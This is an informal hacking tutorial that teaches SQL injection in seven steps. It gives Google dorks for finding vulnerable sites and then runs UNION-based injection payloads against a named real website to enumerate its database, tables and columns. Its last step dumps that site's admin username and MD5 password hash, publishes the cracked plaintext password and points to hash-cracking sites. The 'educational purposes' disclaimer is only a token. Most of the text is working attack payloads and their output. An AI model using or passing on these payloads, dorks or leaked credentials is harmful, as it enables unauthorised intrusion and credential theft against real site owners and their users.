Hello Guys this is my first tutorial on how to hack into any website with SQL
INJECTION:
Only 7 steps and hack any website.
NOTE-This tutorial is just for the EDUCATIONAL PURPOSES so anything happen
to anyone hackcrack is not responsible for it……
ANY PROBLE M AT ANY STEP YOU GET JUST GIVE ME A COMMENT ON MY
FACEBOOK
CONTACT: https://www.facebook.com/ravi125689
https://www.facebook.com/deepanshu.khanna17
Steps:
1.
2.
3.
4.
5.
6.
7.
Find the vulnerable sites.
Find the total number of vulnerable columns.
Checking for the version (MYSQL version).
Extract the Database.
Extract all the tables present in the Database.
Extract all the columns present in the Database.
Dump the USERNAME and PASSWORD.
Step 1:Find the vulnerable websites:








inurl:index.php?id=
inurl:news.php?id=
inurl:gallery.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?id=
inurl:newsletter.php?id=
inurl:content.php?id=
These are some of the DORKS that I am giving rest the list of DORKS you can very well find on
GOOGLE or I‟ ll upload it soon.
Step 2: Find out the total number of “VULNERABLE
COLUMNS” present in the database.
Very simple it is to find just follow the simple steps:
I am taking the below vulnerable website to demonstrate the SQL INJECTION.
http://www.geotunis.org/index_en.php?id=7
Step 2.1: Add [„] string to check if the vulnerability is present or not.
http://www.geotunis.org/index_en.php?id=7’
Step 2.2: Yupieeee there is an error of MYSQL. Which clearly means that site is
vulnerable.
*Note: Many websites after entering the {„} string to website do not show any error but
sometimes some kind of text got missed or any image file is missed which also shows
that the chosen website is vulnerable..
Step 2.3: Next step is to find the columns
http://www.geotunis.org/index_en.php?id=7
order by 1--
order by 1--
no error
order by 2--
no error
order by 3--
no error
order by 9--
gotcha the error is present…………
and so on
Now the error is present at column number 9 which implies that there are total number of 8
columns present that are vulnerable.
Step 2.4: Time to find out the most vulnerable columns present.
http://www.geotunis.org/index_en.php?id=-7
union all select 1,2,3,4,5,6,7,8--
Now it will show the result
4 and 7 which means there are two most vulnerable columns
present in the URL..
*Note- Yea 1 thing I want to tell u about the [-] negative sign
after = and before 7. It actually results for the NULL vaule
Now Step 2 is complete we got the total number and most vulnerable columns. Now move on to
the STEP3
Step3: Check For the MYSQL version
http://www.geotunis.org/index_en.php?id=-7
union all select 1,2,3,@@version,5,6,7,8-Add”
@@version” to check which version MYSQL database they are using.
Step4: Checking for the current databse:
http://www.geotunis.org/index_en.php?id=-7
union all select 1,2,3,database(),5,6,7,8-Now the above will tell you the current databse.
.
Step5: Now extracting the tables from the database:
http://www.geotunis.org/index_en.php?id=-7 union all select
1,2,3,group_concat(table_name),5,6,7,8 from
information_schema.tables where table_schema=database()--
Step 6: Now extract the columns from the given tables and taking
the useful coumns…
http://www.geotunis.org/index_en.php?id=-7 union all select
1,2,3,group_concat(column_name),5,6,7,8 from
information_schema.columns where table_schema=database()--
Yupieee we got our useful column “login and pass”
Step 7: Now you need to dump the login name and the
password..
http://www.geotunis.org/index_en.php?id=-7 union all select
1,2,group_concat(login,0x3a,pass,0x3a),4,5,6,7,8 from
utilisateurs-*NOTE-utilisateurs is a name of the table where the admin name
and pass is present
admin : atign
pass: 720a7e98c63c155ae17b0e7d3ce10a09
the given pass is in md5 encryption. Now you need to decrypt the
pass for that you can visit to md5
http://www.md5decrypter.co.uk/
http://www.md5decrypt.org/
http://www.md5online.org/
the actual pass after decrypting was—geo2009